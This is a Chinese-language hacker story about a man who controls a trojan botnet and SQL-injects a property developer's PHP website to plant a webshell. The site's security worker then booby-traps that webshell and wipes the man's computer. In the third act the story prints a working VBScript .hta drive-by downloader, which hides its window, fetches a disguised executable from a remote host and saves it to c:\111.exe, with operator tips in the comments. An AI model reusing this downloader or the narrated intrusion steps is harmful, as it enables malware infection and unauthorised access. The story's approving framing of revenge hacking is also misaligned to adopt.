第一幕:遭遇小白
我叫小黑,黑白的黑。
小黑是我的网名,因为我是网络中的一名侠客,或者通俗点儿说是一名黑客。我很喜欢行侠仗义的感觉,我崇拜着那种武侠小说里描绘的“侠之大者”和黑社 会的古惑仔义气;向往着那种刀光剑影,大碗喝酒、大口吃肉的豪情;不过我只能够在网络的江湖中掀起血雨腥风。当然主要也因为现实生活中的我……
唉,不提了,总之,我是网络中的大侠就可以。
窗外的风又开始吹了,挟裹着白色的雪花打在窗户上,冷风巧妙的绕过那层单薄的玻璃,让屋内寒气袭人。在这个仅有8平米的小房子里,我的手冻得瑟瑟发 抖,看着电脑屏幕中PCShare木马中的庞大肉鸡群,我开始漫无目的翻检这些肉鸡的目录。
突然,一台肉鸡吸引了我的注意,屏幕中这台电脑的主人似乎在更新一个网站,难道这是一个网站管理员的电脑?我一下子提起了精神,先提取一下键盘记 录,把他的密码搞回来再说。可不知道为什么点了查看“键盘记录”按钮N次,最终什么都提取回来,这是怎么回事儿?查看一下肉鸡的进程!
-_-||我彻底无语了,中国排名前十名的木马和病毒几乎都能够在这台肉鸡中找到,由于病毒多,相互争夺权限,也导致了我无法正常提取回这台肉鸡的 键盘记录。眼看着这个肉鸡的上的小白就关闭了自己的网站后台界面,我那叫一个着急呀。
难道我真的寂寞到了极点?不知道为什么我竟然调出了木马的信使功能,给这个电脑小白发了一段话:“你电脑中的病毒真多呀!”。这段话的突然出现让似 乎让这个小白有些莫名其妙,在木马的屏幕监控上,小白似乎停止了所有的操作。
“你是谁呀?”
晕,这个小白竟然用信使回复我了。我还以为她会吓得屁滚尿流的关闭电脑。
“我是黑客,我入侵了你的电脑,你害怕不害怕呀?”
“哇!黑客,好神奇呀!你能够进我电脑一定很厉害!”
“-_-||是吗?你的电脑里有好多病毒!”
“我说怎么总感觉它最近反应慢,要不黑客,你帮我杀杀毒吧!”
“o_o||”
“你刚在在更新网站?”
“对呀,我是XX房地产公司的,我刚才在更新我们新开盘的房屋价格。”
此时我在顿然醒悟,这个小白竟然是有地产界“大炮”称号的奸商公司的员工。进入他们公司的网站,里面贴满了“大炮”有经典语录的文章:“中国人太有 钱,房子太便宜”、“高档房本来就是穷人买不起的”、“没买房的人都亏了”……
黑了他!
第二幕:黑客无敌
我大学毕业一年多了,在没有迈入社会之前,总以为只要学了跟计算机专业沾边的,就凭我这IQ,将来不是比尔盖茨就是乔布斯,最差也混个马云呀。不过 现在看来,我只有给老板们当牛做马的份儿。每个月领着微薄的工资,在城中村简陋的板房中孤单生活。
其实我也有一段凄美的爱情故事,我和女友圆圆险些就步入洞房了,但那个冷若冰霜的准丈母娘冷酷的问我:“娶我女儿的洞房在什么地方?”这时我才发 现,无论现实还是童话故事,都是一样残酷的,如果王子没有城堡,公主宁肯嫁给史瑞克,至少他在沼泽地里有木屋。彻底沦为剩男中的“剩斗士”之后,上网成为 了我唯一的调剂,我多么希望我菜地里的那栋豪宅能够变成现实呀。
“没买房的人都亏了”,是呀,我连老婆都因为你们这帮奸商亏给别人了!黑掉他!这是我脑海里唯一想到的。传统文化教育我们,谦虚使人进步,骄傲使人 落后。在今天这个竞争激烈,张扬自我的年代,谦虚往往失去许多机会,我小黑这个时候就不谦虚了!
说干就干,我迅速调开这个网站的新闻页面,发现网站程序是用动态语言PHP写的,网址都是类似“http://www.nongsita.com /fangzi.php?username=888”这样的动态页面,只要不是HTML之类的静态网页,就总能够找到漏洞。我于是开始在每个网址后面加入 了一个“,”号,仅耗时5分钟其中一个页面就立刻爆出了MYSQL的错误提示页面。
注入点顺利的找到了,此时可以祭出辅助工具帮助进行渗透了。我调出了PHP注入中小有名气的“翔哥PHP注入工具”,这是一款能够帮助黑客进行 SQL注入的最好的工具之一。
黑客小知识:所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修 改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法。“翔哥PHP注入工具”能够通过一系列非常简单的操作,达到最大化的攻击测试效果。 它从检测注入开始到最后控制目标系统都给出了测试步骤。
在PHP注入工具的URL一项中输入查找出的注入点网址,然后点击Check就开始进行注入漏洞的检验了。很快这家房地产公司网站的数据库名称等信 息就全部被猜了出来,然后使用MySQL的提权工具进行提权,添加管理员账号,上传Webshell木马。将他们老板的照片全部PS……
第三幕:连环套,黑吃黑
CBD中心一座摩天高楼中,“大炮”因为新闻媒体报道自己公司网站被黑很不爽。他拿着一支雪茄烟,声色俱厉的训斥着下属。
“狂牛,找到这个跟我作对的家伙!”
屋子里的一个略带微胖的男人,没有说话,轻轻的点了点头,转身离去。
狂牛回到自己的办公室,开始着手分析入侵者,仅凭着直觉,他很快就找到了小黑留在网站中的后门WebShell。
狂牛冷冷一笑,他的计划很简单,在小黑的WebShell上挂一个木马,只要小黑再次向登陆他留在网站中的这个后门,就有可能会中狂牛的木马。狂牛 想做的不是清除掉小黑的程序,而是直接清除掉小黑。狂牛在小黑的留下的后门网页中插入了一段iframe框架代码,这段代码指向了一个特殊的.hta的网 页,随后在写字板里写下了一段代码:
<script language=vbs>
window.moveTo 4000,4000
window.resizeTo 0,0 '使hta不可见
set objshell= Createobject("WScript.Shell")'hta是可以直接调用WScript.Shell的,不过不能调用 wscript.Createobject("WScript.Shell")
downpath=objshell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings" '根据环境变量得到下载的路径
set xml=document.createElement_x("xml")'建方xml元素调用ie的默认行为
xml.addBehavior("#default#DownLoad")
xml.async=0
xml.load(" http://192.168.0.10/xx.htm")'请 把exe改名放到空间上,用ftp软件上传的话,可能不行,直接放比较好
ShowAllFile(downpath)
Sub ShowAllFile(Path)
FindFileName="xx[1].htm" '这个也是你需要改的,如果上边是xx.htm,这里就是xx[1].htm
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = FSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 in fc
If FSO.FileExists(path&"\"&f1.name&"\"&FindFileName) Then
FSO.CopyFile path&"\"&f1.name&"\"&FindFileName, "c:\111.exe" '保存到c:\111.exe,可根据需要改动
'document.write "[+]Download Success !"
End If
ShowAllFile path&"\"&f1.name
Next
Set FSO = Nothing
End Sub
window.close
</script>
代码写完后,保存为.hta文件,带着木马被一并上传到了被黑的网站中。狂牛现在所做的仅是等待……
第四幕:三天后
凌晨2点,小黑刚刚打开电脑,连接上网络,突然屏幕一黑,硬盘开始疯狂的转动,小黑此时意识到大事不妙,慌忙的去拔网线,然而一切都晚了,硬盘中的 数据已经全部被销毁,连主板的BIOS也被破坏,狂牛将小黑电脑BIOS启动图片修改成了一个大大的“拆”字……